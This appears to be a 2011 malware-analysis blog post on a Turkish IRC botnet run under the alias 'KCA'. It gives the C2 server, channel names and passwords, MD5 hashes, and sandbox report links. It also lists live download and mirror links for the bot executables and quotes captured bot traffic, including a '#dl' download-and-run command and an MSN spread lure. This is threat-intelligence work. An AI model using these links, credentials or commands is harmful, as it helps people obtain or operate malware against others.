Monday, September 12, 2011

KCA's Botnet

BoTNeTRooT@hotmail.com
Goes under the alias KCA
SohbetCeLL.Net

Server: tr.byinter.net (149.3.130.4)
Main Channel: #BoTiSTaN

Bots:
Unknown IRC Bots:
http://www.sohbetcell.net/KCA.exe
http://www.sohbetcell.net/bot.exe (Possibly TsGh Bot)
http://www.sohbetcell.net/images.exe

RageBot/Agobot:
http://www.sohbetcell.net/vnc.exe

DorkBot/NgrBot Variants:
http://www.sohbetcell.net/bg.exe
http://www.sohbetcell.net/enes.exe

Other bots used:
The IRC also uses Aryan bot; I was unable to acquire an .exe at the time of this analysis.

Mirror (in case he removes the bots from his site):
http://www.mediafire.com/download.php?7tyho4d186y0y9s
http://www.multiupload.com/USXT6VA2XB

KCA.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315763939
http://www.threatexpert.com/report.aspx?...5e686ac6db
http://anubis.iseclab.org/?action=result...d14e07eca2
Md5: e4e34ef3c4609a89bfc0b95e686ac6db
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:

Nick: KCA{AUT-XP}992432
Username: 9924
Server Pass: KCA
Joined Channel: #KCA with Password KCAt
Private Message to Channel #KCA: "www.metalteam.oRg"



bot.exe (IRC Bot) (Possibly variant of TsGh bot)
http://www.virustotal.com/file-scan/repo...1315765287
http://www.threatexpert.com/report.aspx?...979195befc
http://anubis.iseclab.org/?action=result...d056960105
Md5: 1978e6758d4ab41f392457979195befc
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:

Nick: KCA[iRooT-XP-AUT]039489
Username: 6044
Joined Channel: #botnet with Password KCA
Private Message to Channel #botistan: "#dl http://www.sohbetcell.net/bg.exe 1"



images.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315764816
http://www.threatexpert.com/report.aspx?...fa65617b49
http://anubis.iseclab.org/?action=result...91fcc18a9d
Md5: 01985cc5f38d8a719da83efa65617b49
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:

Nick: [9355|AUT|XP|KCA]
Username: 9355
Server Pass: KCA
Joined Channel: #KCA with Password KCA



vnc.exe (Rage Bot/Agobot)
http://www.virustotal.com/file-scan/repo...1315764819
http://www.threatexpert.com/report.aspx?...721c444cd3
http://anubis.iseclab.org/?action=result...f96c16f376
Md5: 23c849b73f74236f15159b721c444cd3
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:

Nick: X{KCA|VNC}60389
Username: ummkj
Joined Channel: #vnc with Password KCA



bg.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315764588
http://www.threatexpert.com/report.aspx?...08eb6ca464
http://anubis.iseclab.org/?action=result...b89bf83d87
Md5: ba93b01ff4a0e63f9b35d808eb6ca464
IRC Connection: 149.3.130.4:6667
IRC Conversations:

NICK n{US|XPa}brjxndz
USER brjxndz 0 0 :brjxndz
JOIN #BETA KCA
PRIVMSG #beta :[MSN]: Updated MSN spread message to "This is in the image that you? http://www.sohbetcell.net/images.php?id="



enes.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315767195
http://www.threatexpert.com/report.aspx?...cb225a2b3b
http://anubis.iseclab.org/?action=result...f3794cdfa5
Md5: 95552ba9c7530c3cd25f7bcb225a2b3b
